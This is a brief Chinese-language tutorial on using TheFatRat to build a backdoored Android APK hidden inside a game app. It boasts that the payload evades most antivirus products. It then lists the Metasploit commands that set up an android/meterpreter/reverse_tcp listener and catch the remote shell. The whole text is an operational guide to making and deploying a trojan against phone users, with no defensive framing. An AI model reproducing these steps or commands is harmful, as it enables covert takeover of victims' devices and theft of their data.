TheFatRat是一个大规模的开发工具、也是功能非常强大的自动化渗透工具。版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击如浏览器攻击DLL。
该工具使用流行的有效负载编译恶意软件然后编译后的恶意软件可以在windowsandroid和mac上执行。
使用此工具创建的恶意软件也有能力绕过大多数AV软件保护。TheFatRat安装好以后
在这里我们选择第五个、意思是生成一个apk的后门就是android的app。
点击回车
配置我们的本地IP地址和监听的端口。以及放置游戏apk文件的地址
设置好本地IP地址和监听的端口。以及放置游戏apk文件的地址
如上图出现1-6选项我们选择3生成一个tcp的反弹链接。
然后选择2配置生成后门我们可以看到已经有后门程序的总览。
然后在这里选择y下一步输入配置文件的名字可以随便起一个
这样木马就生成了在home/Thefatrat/backdoored目录下
启动msf,配置监听模块反弹链接;攻击机IP地址监听端口执行攻击exploit。如图所示
在kali的命令行中输入msfconsole 来启动msf 启动后如图
配置监听模块反弹链接攻击机IP地址监听端口执行攻击exploit
命令如下
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //设置一个安卓tcp反弹
set LHOST IP // 设置攻击者的IP地址
exploit //监听与攻击